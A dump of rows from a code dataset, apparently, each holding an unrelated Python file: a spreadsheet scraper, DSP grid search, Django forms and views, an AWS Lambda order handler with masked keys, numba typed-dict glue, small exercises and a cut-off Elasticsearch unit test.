book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
import scraperwiki
import xlrd
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
|
5,170 | efe2d6f5da36679b77de32d631cca50c2c1dd29e | import numpy as np
from .build_processing_chain import build_processing_chain
from collections import namedtuple
from pprint import pprint
def run_one_dsp(tb_data, dsp_config, db_dict=None, fom_function=None, verbosity=0):
"""
Run one iteration of DSP on tb_data
Optionally returns a value for optimization
Parameters:
-----------
tb_data : lh5 Table
An input table of lh5 data. Typically a selection is made prior to
sending tb_data to this function: optimization typically doesn't have to
run over all data
dsp_config : dict
Specifies the DSP to be performed for this iteration (see
build_processing_chain()) and the list of output variables to appear in
the output table
db_dict : dict (optional)
DSP parameters database. See build_processing_chain for formatting info
fom_function : function or None (optional)
When given the output lh5 table of this DSP iteration, the
fom_function must return a scalar figure-of-merit value upon which the
optimization will be based. Should accept verbosity as a second argument
verbosity : int (optional)
verbosity for the processing chain and fom_function calls
Returns:
--------
figure_of_merit : float
If fom_function is not None, returns figure-of-merit value for the DSP iteration
tb_out : lh5 Table
If fom_function is None, returns the output lh5 table for the DSP iteration
"""
pc, _, tb_out = build_processing_chain(tb_data, dsp_config, db_dict=db_dict, verbosity=verbosity)
pc.execute()
if fom_function is not None: return fom_function(tb_out, verbosity)
else: return tb_out
ParGridDimension = namedtuple('ParGridDimension', 'name i_arg value_strs companions')
class ParGrid():
""" Parameter Grid class
Each ParGrid entry corresponds to a dsp parameter to be varied.
The ntuples must follow the pattern:
( name, i_arg, value_strs, companions) : ( str, int, list of str, list, or None )
where name is the name of the dsp routine in dsp_config whose to be
optimized, i_arg is the index of the argument to be varied, value_strs is
the array of strings to set the argument to, and companions is an optional
list of ( name, i_arg, value_strs ) tuples for companion arguments that
need to change along with this one
Optionally, i_arg can be a list of the argument indices to be varied together,
where value_strs is a list of lists correponding to the strings to set the
arguments to in the same order.
"""
def __init__(self):
self.dims = []
def add_dimension(self, name, i_arg, value_strs, companions=None):
self.dims.append( ParGridDimension(name, i_arg, value_strs, companions) )
def get_n_dimensions(self):
return len(self.dims)
def get_n_points_of_dim(self, i):
return len(self.dims[i].value_strs)
def get_shape(self):
shape = ()
for i in range(self.get_n_dimensions()):
shape += (self.get_n_points_of_dim(i),)
return shape
def get_n_grid_points(self):
return np.prod(self.get_shape())
def get_par_meshgrid(self, copy=False, sparse=False):
""" return a meshgrid of parameter values
Always uses Matrix indexing (natural for par grid) so that
mg[i1][i2][...] corresponds to index order in self.dims
Note copy is False by default as opposed to numpy default of True
"""
axes = []
for i in range(self.get_n_dimensions()):
axes.append(self.dims[i].values_strs)
return np.meshgrid(*axes, copy, sparse, indexing='ij')
def get_zero_indices(self):
return np.zeros(self.get_n_dimensions(), dtype=np.uint32)
def iterate_indices(self, indices):
""" iterate given indices [i1, i2, ...] by one.
For easier iteration. The convention here is arbitrary, but its the
order the arrays would be traversed in a series of nested for loops in
the order appearin in dims (first dimension is first for loop, etc):
Return False when the grid runs out of indices. Otherwise returns True.
"""
for iD in reversed(range(self.get_n_dimensions())):
indices[iD] += 1
if indices[iD] < self.get_n_points_of_dim(iD): return True
indices[iD] = 0
return False
def get_data(self, i_dim, i_par):
name = self.dims[i_dim].name
i_arg = self.dims[i_dim].i_arg
value_str = self.dims[i_dim].value_strs[i_par]
companions = self.dims[i_dim].companions
return name, i_arg, value_str, companions
def print_data(self, indices):
print(f"Grid point at indices {indices}:")
for i_dim, i_par in enumerate(indices):
name, i_arg, value_str, _ = self.get_data(i_dim, i_par)
print(f"{name}[{i_arg}] = {value_str}")
def set_dsp_pars(self, dsp_config, indices):
for i_dim, i_par in enumerate(indices):
name, i_arg, value_str, companions = self.get_data(i_dim, i_par)
if dsp_config['processors'][name].get('init_args') is not None:
if np.isscalar(i_arg):
dsp_config['processors'][name]['init_args'][i_arg] = value_str
else:
for i in range(len(i_arg)):
dsp_config['processors'][name]['init_args'][i_arg[i]] = value_str[i]
if companions is None: continue
for ( c_name, c_i_arg, c_value_str ) in companions:
dsp_config['processors'][c_name]['init_args'][c_i_arg] = c_value_str[i_par]
else:
if np.isscalar(i_arg):
dsp_config['processors'][name]['args'][i_arg] = value_str
else:
for i in range(len(i_arg)):
dsp_config['processors'][name]['args'][i_arg[i]] = value_str[i]
if companions is None: continue
for ( c_name, c_i_arg, c_value_str ) in companions:
dsp_config['processors'][c_name]['args'][c_i_arg] = c_value_str[i_par]
def run_grid(tb_data, dsp_config, grid, fom_function, dtype=np.float64, db_dict=None, verbosity=0):
"""Extract a table of optimization values for a grid of DSP parameters
The grid argument defines a list of parameters and values over which to run
the DSP defined in dsp_config on tb_data. At each point, a scalar
figure-of-merit is extracted
Returns a N-dimensional ndarray of figure-of-merit values, where the array
axes are in the order they appear in grid.
Parameters:
-----------
tb_data : lh5 Table
An input table of lh5 data. Typically a selection is made prior to
sending tb_data to this function: optimization typically doesn't have to
run over all data
dsp_config : dict
Specifies the DSP to be performed (see build_processing_chain()) and the
list of output variables to appear in the output table for each grid point
grid : ParGrid
See ParGrid class for format
fom_function : function
When given the output lh5 table of this DSP iteration, the fom_function
must return a scalar figure-of-merit. Should accept verbosity as a
second keyword argument
dtype : dtype (optional)
The data type of the fom_function's return object. Should be np.ndarray if
fom_function is set to None
db_dict : dict (optional)
DSP parameters database. See build_processing_chain for formatting info
verbosity : int (optional)
Verbosity for the processing chain and fom_function calls
Returns:
--------
grid_values : ndarray of floats
An N-dimensional numpy ndarray whose Mth axis corresponds to the Mth row
of the grid argument
"""
grid_values = np.ndarray(shape=grid.get_shape(), dtype=dtype)
iii = grid.get_zero_indices()
if verbosity > 0: print("Starting grid calculations...")
while True:
grid.set_dsp_pars(dsp_config, iii)
if verbosity > 1: pprint(dsp_config)
if verbosity > 0: grid.print_data(iii)
grid_values[tuple(iii)] = run_one_dsp(
tb_data, dsp_config, db_dict=db_dict, fom_function=fom_function, verbosity=verbosity)
if verbosity > 0: print('Value:', grid_values[tuple(iii)])
if not grid.iterate_indices(iii): break
return grid_values
|
5,171 | 89c44d35559504501e4333ea6ff4d3528f1a4c4f | from django.contrib import admin
from .models import Profile
from django.contrib.admin.templatetags.admin_list import admin_actions
admin.site.register(Profile)
# Register your models here.
|
5,172 | 511ea9eb1dc234a488c19f9ee9fbd40f81955d54 | from __future__ import print_function # Python 2/3 compatibility
import boto3
import json
import decimal
AWS_KEY = '****'
AWS_SECRET = '****'
def handler(event, context):
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', aws_access_key_id=AWS_KEY , aws_secret_access_key=AWS_SECRET)
table = dynamodb.Table('orders')
body = event['body-json']
response = table.put_item(Item=body)
menu_id = body['menu_id']
table = dynamodb.Table('pizzashop')
menu = table.get_item(
Key={
'menu_id': menu_id,
}
)
selection = menu['Item']['selection']
index = 0
all_items = ''
for item in selection:
index +=1
all_items += str(index) + '. ' + item + ','
all_items = all_items[:-1]
message = "Hi " + body['customer_name'] + ', please choose one of these selection: ' + all_items
return {"message" : message}
#return menu
|
5,173 | ad44e9411ba6a07c54bb55b0d8af9d0c16c6b71b | """
Python wrapper that connects CPython interpreter to the numba dictobject.
"""
from collections import MutableMapping
from numba.types import DictType, TypeRef
from numba import njit, dictobject, types, cgutils
from numba.extending import (
overload_method,
box,
unbox,
NativeValue
)
@njit
def _make_dict(keyty, valty):
return dictobject._as_meminfo(dictobject.new_dict(keyty, valty))
@njit
def _length(d):
return len(d)
@njit
def _setitem(d, key, value):
d[key] = value
@njit
def _getitem(d, key):
return d[key]
@njit
def _delitem(d, key):
del d[key]
@njit
def _contains(d, key):
return key in d
@njit
def _get(d, key, default):
return d.get(key, default)
@njit
def _setdefault(d, key, default):
return d.setdefault(key, default)
@njit
def _iter(d):
return list(d.keys())
@njit
def _copy(d):
return d.copy()
def _from_meminfo_ptr(ptr, dicttype):
d = TypedDict(meminfo=ptr, dcttype=dicttype)
return d
class TypedDict(MutableMapping):
"""A typed-dictionary usable in Numba compiled functions.
Implements the MutableMapping interface.
"""
@classmethod
def empty(cls, key_type, value_type):
"""Create a new empty TypedDict with *key_type* and *value_type*
as the types for the keys and values of the dictionary respectively.
"""
return cls(dcttype=DictType(key_type, value_type))
def __init__(self, **kwargs):
"""
Parameters
----------
dcttype : numba.types.DictType; keyword-only
The dictionary type
meminfo : MemInfo; keyword-only
Used internally to pass the MemInfo object when boxing.
"""
self._dict_type, self._opaque = self._parse_arg(**kwargs)
def _parse_arg(self, dcttype, meminfo=None):
if not isinstance(dcttype, DictType):
raise TypeError('*dcttype* must be a DictType')
if meminfo is not None:
opaque = meminfo
else:
opaque = _make_dict(dcttype.key_type, dcttype.value_type)
return dcttype, opaque
@property
def _numba_type_(self):
return self._dict_type
def __getitem__(self, key):
return _getitem(self, key)
def __setitem__(self, key, value):
return _setitem(self, key, value)
def __delitem__(self, key):
_delitem(self, key)
def __iter__(self):
return iter(_iter(self))
def __len__(self):
return _length(self)
def __contains__(self, key):
return _contains(self, key)
def __str__(self):
buf = []
for k, v in self.items():
buf.append("{}: {}".format(k, v))
return '{{{0}}}'.format(', '.join(buf))
def __repr__(self):
body = str(self)
prefix = str(self._dict_type)
return "{prefix}({body})".format(prefix=prefix, body=body)
def get(self, key, default=None):
return _get(self, key, default)
def setdefault(self, key, default=None):
return _setdefault(self, key, default)
def copy(self):
return _copy(self)
# XXX: should we have a better way to classmethod
@overload_method(TypeRef, 'empty')
def typeddict_empty(cls, key_type, value_type):
if cls.instance_type is not DictType:
return
def impl(cls, key_type, value_type):
return dictobject.new_dict(key_type, value_type)
return impl
@box(types.DictType)
def box_dicttype(typ, val, c):
context = c.context
builder = c.builder
# XXX deduplicate
ctor = cgutils.create_struct_proxy(typ)
dstruct = ctor(context, builder, value=val)
# Returns the plain MemInfo
boxed_meminfo = c.box(
types.MemInfoPointer(types.voidptr),
dstruct.meminfo,
)
numba_name = c.context.insert_const_string(c.builder.module, 'numba')
numba_mod = c.pyapi.import_module_noblock(numba_name)
typeddict_mod = c.pyapi.object_getattr_string(numba_mod, 'typeddict')
fmp_fn = c.pyapi.object_getattr_string(typeddict_mod, '_from_meminfo_ptr')
dicttype_obj = c.pyapi.unserialize(c.pyapi.serialize_object(typ))
res = c.pyapi.call_function_objargs(fmp_fn, (boxed_meminfo, dicttype_obj))
c.pyapi.decref(fmp_fn)
c.pyapi.decref(typeddict_mod)
c.pyapi.decref(numba_mod)
c.pyapi.decref(boxed_meminfo)
return res
@unbox(types.DictType)
def unbox_dicttype(typ, val, c):
context = c.context
builder = c.builder
miptr = c.pyapi.object_getattr_string(val, '_opaque')
native = c.unbox(types.MemInfoPointer(types.voidptr), miptr)
mi = native.value
ctor = cgutils.create_struct_proxy(typ)
dstruct = ctor(context, builder)
data_pointer = context.nrt.meminfo_data(builder, mi)
data_pointer = builder.bitcast(
data_pointer,
dictobject.ll_dict_type.as_pointer(),
)
dstruct.data = builder.load(data_pointer)
dstruct.meminfo = mi
dctobj = dstruct._getvalue()
c.pyapi.decref(miptr)
return NativeValue(dctobj)
|
5,174 | 9e2af13a15a98702981e9ee369c3a132f61eac86 | #!python
# -*- coding: utf-8 -*-
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from window.window import *
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_()) |
5,175 | 7484bd9012bc9952b679073ae036de4554d362be | from django import forms
from .models import Recipe, Ingredient, Category, Tag
from blog.widgets import CustomClearableFileInput
class NewCategoriesForm(forms.ModelForm):
friendly_name = forms.CharField(label='... or add your own category',
required=False)
class Meta():
model = Category
fields = ('friendly_name',)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
placeholders = {
'friendly_name': 'One single word only'
}
for field in self.fields:
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
class NewTagsForm(forms.ModelForm):
tagname = forms.CharField(label='... or add your own tag', required=False)
class Meta():
model = Tag
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
placeholders = {
'tagname': 'One single word only'
}
for field in self.fields:
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
class IngredientForm(forms.ModelForm):
class Meta:
model = Ingredient
exclude = ('recipe', )
labels = {
'quantity': 'Qty',
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
placeholders = {
'quantity': 'eg: 0.1',
'unit': 'eg: ml',
'preparation': 'eg: chopped',
'name': 'eg: tomatoes'
}
for field in self.fields:
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
self.fields['quantity'].widget.attrs['min'] = 0.01
IngredientFormSet = forms.inlineformset_factory(Recipe, Ingredient,
form=IngredientForm,
extra=25,
min_num=1,
validate_min=True)
class RecipeForm(forms.ModelForm):
# Replace image field
image = forms.ImageField(label='Image',
required=False,
widget=CustomClearableFileInput)
# Change rendering of form to user-friendly checkboxes
# Credit:
# https://medium.com/swlh/django-forms-for-many-to-many-fields-d977dec4b024
category = forms.ModelMultipleChoiceField(
queryset=Category.objects.all(),
label='Choose some categories from the list',
required=False,
widget=forms.CheckboxSelectMultiple
)
# Change rendering of form to user-friendly checkboxes
# Credit:
# https://medium.com/swlh/django-forms-for-many-to-many-fields-d977dec4b024
tag = forms.ModelMultipleChoiceField(
queryset=Tag.objects.all(),
label='Choose some tags from the list',
required=False,
widget=forms.CheckboxSelectMultiple
)
class Meta:
model = Recipe
exclude = ('author', 'date',
'date_posted', 'date_edited',
'vote_count', 'votes', 'recipe_box',
'mail_sent', 'discount_code',)
labels = {
'intro': 'Brief Description',
}
def clean_servings(self):
value = self.cleaned_data.get('servings')
if value < 1:
raise forms.ValidationError('The number of servings must be \
greater than zero')
return value
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
categories = Category.objects.all().order_by('friendly_name')
friendly_name = [(c.id, c.get_friendly_name()) for c in categories]
placeholders = {
'title': 'eg: Carrot Cake',
'intro': 'eg: A deliciously sweet dessert',
'prep_time': 'eg: 1hr 20mins',
'cook_time': 'eg: 1hr 20mins',
'total_time': 'eg: 1hr 20mins',
'directions': 'Describe the steps to make this recipe',
'image': '',
'image_credit': 'Who took the photo?',
'servings': 'No. of servings',
'tag': '',
'category': '',
}
for field in self.fields:
placeholder = placeholders[field]
self.fields[field].widget.attrs['placeholder'] = placeholder
self.fields['category'].choices = friendly_name
self.fields['title'].widget.attrs['autofocus'] = True
self.fields['directions'].required = True
|
5,176 | 27ec06d084bf819383801be0351c04e7d1fc1752 | #Las listas son similares a las tuplas
# con la diferencia de que permiten modificar los datos una vez creados
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print (miLista)
miLista[2] = 3.8 #el tercer elemento ahora es 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
|
5,177 | b13d4b0ccb693fb97befb4ee47974d8ee076b52b | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
def get_template_args(self):
return {
'app_title':"Capteurs de lumière et de couleur"
}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(
os.path.join(self.application.template_home, "nyi.html"),
**self.get_template_args()
)
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(
os.path.join(self.application.template_home, "home.html"),
**self.get_template_args()
)
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Barrière optique"
self.render(
os.path.join(self.application.template_home, "barrier.html"),
**template_args
)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur noir/blanc"
self.render(
os.path.join(self.application.template_home, "bwdetector.html"),
**template_args
)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur couleur"
self.render(
os.path.join(self.application.template_home, "colordetector.html"),
**template_args
)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args["calibration_cfg"] = self.application.controller.get_calibration_cfg_as_dict()
self.render(
os.path.join(self.application.template_home, "calibration.html"),
**template_args
)
|
5,178 | 8a3694f96203ae8d1e306e1c9a5a47bfe26abeb1 | # -*- coding: utf-8 -*-
from django.shortcuts import render_to_response
from django.views.generic import TemplateView
from django.core.context_processors import csrf
from django.template import RequestContext
from django.views.generic import DetailView, ListView , CreateView , UpdateView , DeleteView , FormView , View
from .models import Contact
from django.core.urlresolvers import reverse_lazy
from django.http import HttpResponse
from django.shortcuts import render_to_response
# Create your views here.
#def home(request):
# posts = Post.objects.all()
# contexto = {'posts' : ''}
# return render_to_response("home.html" , contexto)
class Home(TemplateView):
def get(self, request , *args , **kwargs):
return render_to_response('home.html')
class AddContact(CreateView):
model = Contact
success_url = reverse_lazy('home')
# return render_to_response("home.html" , contexto)
class ListContact(ListView):
model = Contact
|
5,179 | f1c6340880b52ba86856913f74c7d589d9b49f49 | #!/usr/bin/env python3
import warnings
import config
import numpy as np
from latplan.model import ActionAE, default_networks
from latplan.util import curry
from latplan.util.tuning import grid_search, nn_task
import keras.backend as K
import tensorflow as tf
float_formatter = lambda x: "%.3f" % x
np.set_printoptions(formatter={'float_kind':float_formatter})
################################################################
# default values
default_parameters = {
'lr' : 0.0001,
'batch_size' : 2000,
'full_epoch' : 1000,
'epoch' : 1000,
'max_temperature' : 5.0,
'min_temperature' : 0.1,
'M' : 2,
}
if __name__ == '__main__':
import numpy.random as random
import sys
if len(sys.argv) == 1:
sys.exit("{} [directory]".format(sys.argv[0]))
directory = sys.argv[1]
directory_aae = "{}/_aae/".format(directory)
mode = sys.argv[2]
from latplan.util import get_ae_type
ae = default_networks[get_ae_type(directory)](directory).load()
if "hanoi" in ae.path:
data = np.loadtxt(ae.local("all_actions.csv"),dtype=np.int8)
else:
data = np.loadtxt(ae.local("actions.csv"),dtype=np.int8)
parameters = {
'N' :[1],
'M' :[128],
'layer' :[400],# 200,300,400,700,1000
'encoder_layers' : [2], # 0,2,3
'decoder_layers' : [2], # 0,1,3
'dropout' :[0.4], #[0.1,0.4],
# 'dropout_z' :[False],
'batch_size' :[2000],
'full_epoch' :[1000],
'epoch' :[1000],
'encoder_activation' :['relu'], # 'tanh'
'decoder_activation' :['relu'], # 'tanh',
# quick eval
'lr' :[0.001],
}
print(data.shape)
try:
if 'learn' in mode:
raise Exception('learn')
aae = ActionAE(directory_aae).load()
except:
aae,_,_ = grid_search(curry(nn_task, ActionAE, directory_aae,
data[:int(len(data)*0.9)], data[:int(len(data)*0.9)],
data[int(len(data)*0.9):], data[int(len(data)*0.9):],),
default_parameters,
parameters)
aae.save()
N = data.shape[1]//2
actions = aae.encode_action(data, batch_size=1000).round()
histogram = np.squeeze(actions.sum(axis=0,dtype=int))
all_labels = np.zeros((np.count_nonzero(histogram), actions.shape[1], actions.shape[2]), dtype=int)
for i, pos in enumerate(np.where(histogram > 0)[0]):
all_labels[i][0][pos] = 1
if 'plot' in mode:
aae.plot(data[:8], "aae_train.png")
aae.plot(data[int(len(data)*0.9):int(len(data)*0.9)+8], "aae_test.png")
aae.plot(data[:8], "aae_train_decoded.png", ae=ae)
aae.plot(data[int(len(data)*0.9):int(len(data)*0.9)+8], "aae_test_decoded.png", ae=ae)
transitions = aae.decode([np.repeat(data[:1,:N], len(all_labels), axis=0), all_labels])
aae.plot(transitions, "aae_all_actions_for_a_state.png", ae=ae)
from latplan.util.timer import Timer
# with Timer("loading csv..."):
# all_actions = np.loadtxt("{}/all_actions.csv".format(directory),dtype=np.int8)
# transitions = aae.decode([np.repeat(all_actions[:1,:N], len(all_labels), axis=0), all_labels])
suc = transitions[:,N:]
from latplan.util.plot import plot_grid, squarify
plot_grid([x for x in ae.decode_binary(suc)], w=8, path=aae.local("aae_all_actions_for_a_state_8x16.png"), verbose=True)
plot_grid([x for x in ae.decode_binary(suc)], w=16, path=aae.local("aae_all_actions_for_a_state_16x8.png"), verbose=True)
plot_grid(ae.decode_binary(data[:1,:N]), w=1, path=aae.local("aae_all_actions_for_a_state_state.png"), verbose=True)
if 'check' in mode:
from latplan.util.timer import Timer
with Timer("loading csv..."):
all_actions = np.loadtxt("{}/all_actions.csv".format(directory),dtype=np.int8)
with Timer("shuffling"):
random.shuffle(all_actions)
all_actions = all_actions[:10000]
count = 0
try:
pre_states = all_actions[:,:N]
suc_states = all_actions[:,N:]
pre_images = ae.decode_binary(pre_states,batch_size=1000)
suc_images = ae.decode_binary(suc_states,batch_size=1000)
import progressbar as pb
bar = pb.ProgressBar(
max_value=len(all_actions),
widgets=[
pb.Timer("Elap: %(elapsed) "),
pb.AbsoluteETA("Est: %(elapsed) "),
pb.Bar(),
])
for pre_state,suc_state,pre_image,suc_image in bar(zip(pre_states,suc_states,pre_images,suc_images)):
generated_transitions = aae.decode([
np.repeat([pre_state],128,axis=0),
all_labels,
],batch_size=1000)
generated_suc_states = generated_transitions[:,N:]
generated_suc_images = ae.decode_binary(generated_suc_states,batch_size=1000)
from latplan.util import bce
errors = bce(generated_suc_images, np.repeat([suc_image],128,axis=0), axis=(1,2))
min_error = np.amin(errors)
if min_error < 0.01:
count += 1
finally:
print({"count": count, "total":len(all_actions)})
actions = aae.encode_action(data, batch_size=1000)
actions_r = actions.round()
histogram = actions.sum(axis=0)
print(histogram)
histogram_r = actions_r.sum(axis=0,dtype=int)
print(histogram_r)
print (np.count_nonzero(histogram_r > 0))
"""* Summary:
Input: a subset of valid action pairs.
* Training:
* Evaluation:
If the number of actions are too large, they simply does not appear in the
training examples. This means those actions can be pruned, and you can lower the number of actions.
TODO:
verify all valid successors are generated, negative prior exploiting that fact
consider changing the input data: all successors are provided, closed world assumption
mearging action discriminator and state discriminator into one network
AD: use the minimum activation among the correct actions as a threshold
or use 1.0
AD: use action label as an additional input to discriminaotr (??)
AD: ensemble
"""
|
5,180 | 5a1c4cc572431f89709d20296d43e8d889e8c5b0 | Dict={0:0, 1:1}
def fibo(n):
if n not in Dict:
val=fibo(n-1)+fibo(n-2)
Dict[n]=val
return Dict[n]
n=int(input("Enter the value of n:"))
print("Fibonacci(", n,")= ", fibo(n))
# uncomment to take input from the user
nterms = int(input("How many terms? "))
# check if the number of terms is valid
if nterms <= 0:
print("Plese enter a positive integer")
else:
print("Fibonacci sequence:")
for i in range(nterms):```
print(fibo(i), end=" , ")
|
5,181 | a4dfac7e15064d92c806a4e3f972f06e4dca6b11 | # maze = [0, 3, 0, 1, -3]
with open('./day_5/input.txt') as f:
maze = f.readlines()
f.close
maze = [int(line.strip()) for line in maze]
# I think I will just expand on the original functions
# from now on rather than separating part one from two
def escape_maze(maze):
end = len(maze) - 1
step_counter = 0
offset = 0
while True:
cur_index = offset
offset = offset + maze[cur_index]
if maze[cur_index] >= 3:
maze[cur_index] = maze[cur_index] - 1
else:
maze[cur_index] = maze[cur_index] + 1
step_counter += 1
if offset > end:
return step_counter
print(escape_maze(maze)) |
5,182 | 5c01b83634b7ae9bc691341d7432a4e59617444c | #!/usr/bin/python
# Classification (U)
"""Program: elasticsearchrepo_create_repo.py
Description: Unit testing of create_repo in
elastic_class.ElasticSearchRepo class.
Usage:
test/unit/elastic_class/elasticsearchrepo_create_repo.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import elastic_class
import version
__version__ = version.__version__
class Elasticsearch(object):
"""Class: ElasticSearch
Description: Class representation of the Elasticsearch class.
Methods:
__init__
"""
def __init__(self, host_list, port=9200):
"""Method: __init__
Description: Initialization instance of the class.
Arguments:
"""
self.hosts = host_list
self.port = port
self.info_status = {"cluster_name": "ClusterName",
"name": "servername"}
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_not_created_repo
test_not_detected_repo
test_missing_repo_name
test_no_repo_dir
test_no_repo_name
test_default
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.host_list = ["host1", "host2"]
self.repo = "reponame"
self.repo2 = "reponame2"
self.repo3 = "reponame3"
self.els = Elasticsearch(self.host_list)
self.repo_dir = "/dir/path/dump2"
self.nodes_data = {"serverid1": {"name": "hostname1", "settings":
{"path": {"data": ["/dir/data1"],
"logs": ["/dir/logs1"]}}},
"serverid2": {"name": "hostname2", "settings":
{"path": {"data": ["/dir/data2"],
"logs": ["/dir/logs2"]}}}}
self.health_data = {"status": "green", "cluster_name": "ClusterName"}
self.dump = "/dir/path/dump"
self.repo_list = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict2 = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}},
"reponame2": {"type": "dbdump", "settings":
{"location": "/dir/path/dump2"}}}
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_created_repo(self, mock_es, mock_repo):
"""Function: test_not_created_repo
Description: Test with repository not created.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository creation failure: " +
" reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_detected_repo(self, mock_es, mock_repo):
"""Function: test_not_detected_repo
Description: Test with repository not detected.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository not detected: reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_missing_repo_name(self, mock_es, mock_repo):
"""Function: test_missing_repo_name
Description: Test with missing repo named.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo = None
self.assertEqual(
els.create_repo(repo_dir=self.repo_dir),
(True,
"ERROR: Missing repo name or" +
" directory: 'None', '/dir/path/dump2'"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
